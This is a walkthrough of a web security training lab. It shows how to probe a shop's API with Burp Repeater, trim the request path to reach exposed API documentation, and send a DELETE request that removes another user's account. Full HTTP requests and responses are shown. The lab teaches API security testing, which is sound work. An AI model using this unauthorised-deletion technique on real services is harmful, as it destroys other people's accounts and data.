Lab: Exploiting an API endpoint using documentation

After starting the exercise, the shop should look similar to the following image. Click on the My account link to open the registration form. Here we enter our access data, user name: wiener, password: peter.

The registration form is shown in the next picture.

In our account we see our user name and email address. We also have access to the function for changing our email address.

We will now change our email address to hacker1@hackerone.org.

We now switch to the Burp Suite and open the Burp Proxy and the HTTP history tab.

We now search for the request PATCH /api/user/wiener in the HTTP history and send it to the Burp Repeater.

To send to the Burp Repeater, move the mouse over the request and press the right mouse button. A context menu appears in which we select the Send to Repeater option.

We now switch to the Burp Repeater and send the request PATCH /api/user/wiener to the application again. In the Response section, we see that we have received valid access data from our user wiener.

In our request, we remove wiener from the first line. The request should now look like this.

PATCH /api/user HTTP/2
Host: 0a53000e04562c37806cd07800600043.web-security-academy.net
Cookie: session=h7ZBnfG6AHq8IA0N6sSl9pYcWFAV1oTh
Content-Length: 33
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: de-DE,de;q=0.9
Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a53000e04562c37806cd07800600043.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a53000e04562c37806cd07800600043.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"hacker1@hackerone.org"}

If we send this request, we receive a HTTP/2 400 Bad Request response. In the body of the response we can see the reason for the error message. An identifier was expected and this was not sent.

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 50

{"error":"Malformed URL: expecting an identifier"}

Now let's remove /user from our path so that our request looks like this.

PATCH /api HTTP/2
Host: 0a53000e04562c37806cd07800600043.web-security-academy.net
Cookie: session=h7ZBnfG6AHq8IA0N6sSl9pYcWFAV1oTh
Content-Length: 33
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: de-DE,de;q=0.9
Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136"
Content-Type: text/plain;charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a53000e04562c37806cd07800600043.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a53000e04562c37806cd07800600043.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"hacker1@hackerone.org"}

When we send the request, we receive an HTTP/2 302 Found response.

HTTP/2 302 Found
Location: /api/
X-Frame-Options: SAMEORIGIN
Content-Length: 0

In Burp Repeater, click on the Follow redirection button.

Now move the mouse to the Response section and right-click, then select the option Show response in browser.

A window will open where we click on the Copy button.

Now open a new tab in your browser and paste the link you just copied. You will now see the API documentation and can delete the user Carlos.

We adjust our request with the following path: DELETE /api/user/carlos. The complete request looks like this.

DELETE /api/user/carlos HTTP/2
Host: 0a53000e04562c37806cd07800600043.web-security-academy.net
Cookie: session=h7ZBnfG6AHq8IA0N6sSl9pYcWFAV1oTh
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: de-DE,de;q=0.9
Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a53000e04562c37806cd07800600043.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a53000e04562c37806cd07800600043.web-security-academy.net/api
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

When we send this request, we receive an HTTP/2 200 OK response, indicating that the user has been deleted.

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 25

{"status":"User deleted"}

The following message appears in the browser.

We have successfully completed the exercise.

Video solution

PreviousAPI Testing NextLab: Finding and exploiting an unused API endpoint

Last updated 2 months ago

hashtagVideo solution

Video solution